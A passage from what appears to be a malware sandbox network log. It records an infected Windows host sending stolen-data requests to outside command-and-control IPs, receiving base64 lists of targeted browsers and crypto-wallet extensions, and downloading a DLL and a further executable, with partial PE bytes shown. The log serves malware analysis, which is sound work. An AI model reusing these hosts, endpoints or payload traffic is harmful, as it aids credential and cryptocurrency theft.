R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
Nov 4, 2024 17:32:35.684036016 CET	1056	IN	Data Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
Nov 4, 2024 17:32:35.727746010 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDHIDAEHCFHJJJJECAA Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 2d 2d 0d 0a Data Ascii: ------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="message"plugins------EHDHIDAEHCFHJJJJECAA--
Nov 4, 2024 17:32:36.011718035 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:35 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 4, 2024 17:32:36.011775970 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 4, 2024 17:32:36.011786938 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 4, 2024 17:32:36.011800051 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 4, 2024 17:32:36.011812925 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Nov 4, 2024 17:32:36.011828899 CET	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Nov 4, 2024 17:32:36.013528109 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 2d 2d 0d 0a Data Ascii: ------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="message"fplugins------JECAFHJEGCFCBFIEGCAE--
Nov 4, 2024 17:32:36.296860933 CET	335	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:36 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 4, 2024 17:32:36.316962957 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ Host: 185.215.113.206 Content-Length: 6303 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:32:36.316962957 CET	6303	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 Data Ascii: ------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 4, 2024 17:32:37.643387079 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:32:37.643618107 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:32:37.643654108 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:32:38.291882038 CET	94	OUT	GET /746f34465cf17784/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 4, 2024 17:32:38.573298931 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:38 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 4, 2024 17:32:38.573317051 CET	112	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @
Nov 4, 2024 17:32:38.573345900 CET	1236	IN	Data Raw: 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: B
Nov 4, 2024 17:32:38.573358059 CET	1236	IN	Data Raw: fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 ea fc ff ff 83 ec 0c eb 8a 90 8d 74 26 00 83 fb 01 75 70 e8 c6 e4 0a 00 89 7c Data Ascii: t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50024	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:40.313601971 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 38 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003898001&unit=246122658369
Nov 4, 2024 17:32:41.242085934 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50025	185.215.113.16	80	7892	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:41.242106915 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 4, 2024 17:32:42.163852930 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:42 GMT Content-Type: application/octet-stream Content-Length: 2124288 Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@Pr !@P.d. p.v@.rsrc .@.idata .@ ).@fawplrfxPX@jtmuhxjqrB @.taggant0 r"H @
Nov 4, 2024 17:32:42.163935900 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.163947105 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.163959026 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.163971901 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.164071083 CET	1236	IN	Data Raw: 04 fc e3 93 a7 b1 ff cb 31 3c 1f 7c db 2e 01 3b c6 60 20 02 2f 7e c6 19 80 a3 9b 2f 74 d0 35 73 1b de dd 1e b2 4f 80 e8 63 b1 08 4b f9 6b 84 21 9b 8f f7 c1 d7 a6 fa 01 59 c7 9d f4 16 b0 35 0a f8 e9 c1 4c 35 37 42 b9 3c 1c 66 82 f0 ec b8 b0 f7 2f Data Ascii: 1<\|.;` /~/t5sOcKk!Y5L57B<f/^_N"Y8!^0X;FEHN;n@Vs%cqao,`uT!WI81uVol&7&7&7&7&7&7&7&7&A\|;7^!r,9)o
Nov 4, 2024 17:32:42.164087057 CET	1236	IN	Data Raw: 99 99 4b 01 26 f7 d2 27 b6 78 2c 70 4f 9f ab 7a 54 1b 41 c0 f5 ab 68 28 bf f3 bc 18 06 59 49 5a 5e 6b 68 ec be be 75 95 3b b4 18 93 ad b3 59 1f db 84 66 50 bf e9 3c d0 f9 c8 61 0f 2b 67 70 11 f6 d5 80 20 08 67 28 a1 e7 36 6c 94 7c 41 33 8c 20 2c Data Ascii: K&'x,pOzTAh(YIZ^khu;YfP<a+gp g(6l\|A3 ,\5\|5VWR#3P3p.4g2uDuP+~R%ef'"dJ8 s(/c.#5t\|Cw3ysA"#4W@tqCp@ vzP
Nov 4, 2024 17:32:42.164098024 CET	1060	IN	Data Raw: d9 c5 03 32 ee bb 2a 9d 9b 8a 42 1b f6 ef 2a 52 f2 c6 47 a0 c5 16 1e e3 bd a0 33 74 96 06 bf b3 a5 cb 4b b1 26 2b 1c 5a 9c ed 0f 42 c1 17 a0 28 aa c5 12 49 66 e5 15 28 60 48 19 29 4e 22 05 9b ad 14 ab 78 3e e5 2a 00 2e 82 28 94 f9 f3 3c 2c bc af Data Ascii: 2BRG3tK&+ZB(If(`H)N"x>.(<,-u&+g)2VaT7*5%Ks&2q(_WA_=/\L,tg'O3#(M)(?a)Fm.=%Q'3)d{/I2k
Nov 4, 2024 17:32:42.164248943 CET	1236	IN	Data Raw: 26 eb 47 32 2a c0 37 28 ae 2b 66 ac 00 a6 b3 9f af ad 87 c7 26 97 d7 8b 37 96 42 ac bc 06 92 37 3e a0 65 f4 00 58 9c c3 b8 1b 21 b7 de a0 e2 3f 30 3f 0b 64 d7 b5 da 3f 30 9b 9f 28 ad f5 63 f4 c2 d8 03 29 70 98 a1 23 e2 1c 2b 6d de e5 2a 68 31 83 Data Ascii: &G27(+f&7B7>eX!?0?d?0(c)p#+mh1Qcs''Nwv&KK#F+k&2/yw!a`\81Gml).ASH+3Qr~1\>KuA/P'0v G:%)$+l*
